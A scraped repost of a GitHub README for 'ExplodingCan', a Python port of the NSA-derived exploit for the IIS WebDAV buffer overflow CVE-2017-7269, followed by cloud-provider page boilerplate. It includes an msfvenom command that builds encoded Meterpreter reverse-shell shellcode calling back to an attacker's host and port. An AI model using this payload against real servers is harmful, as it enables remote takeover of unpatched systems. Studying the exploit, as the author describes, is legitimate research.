Microsoft IIS WebDav ' scstoragepathfromurl ' Remote Buffer Overflow (cve-2017-7269)

Source: Internet
Author: User
Tags microsoft iis cve

ExplodingcanHttps://github.com/danigargu/explodingcan

An implementation of Explodingcan ' s exploit extracted from Fuzzbunch, the "Metasploit" of the NSA.

Details
    • Vulnerability:microsoft IIS WebDav ' scstoragepathfromurl ' Remote Buffer Overflow
    • cve:cve-2017-7269
    • Disclosure Date:march 31 2017
    • Affected Product:microsoft Windows Server 2003 R2 SP2 x86
Why?

Months ago I needed to study this exploit, and finally I implemented it in Python.

Shellcode

The shellcode must is in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (Metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode



Microsoft IIS WebDav ' scstoragepathfromurl ' Remote Buffer Overflow (cve-2017-7269)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.